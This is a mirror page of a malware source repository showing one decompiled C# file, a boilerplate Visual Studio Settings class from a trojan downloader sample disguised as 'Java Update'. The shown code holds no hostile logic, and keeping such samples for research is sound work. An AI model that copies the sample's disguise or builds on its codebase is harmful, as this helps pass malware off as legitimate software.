mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 16:48:52 +00:00
f2ac1ece55
add
22 lines
893 B
C#
22 lines
893 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Java.Properties.Settings
|
|
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
|
|
|
|
using System.CodeDom.Compiler;
|
|
using System.Configuration;
|
|
using System.Runtime.CompilerServices;
|
|
|
|
namespace Java.Properties
|
|
{
|
|
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
|
|
[CompilerGenerated]
|
|
internal sealed class Settings : ApplicationSettingsBase
|
|
{
|
|
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
|
|
|
|
public static Settings Default => Settings.defaultInstance;
|
|
}
|
|
}
|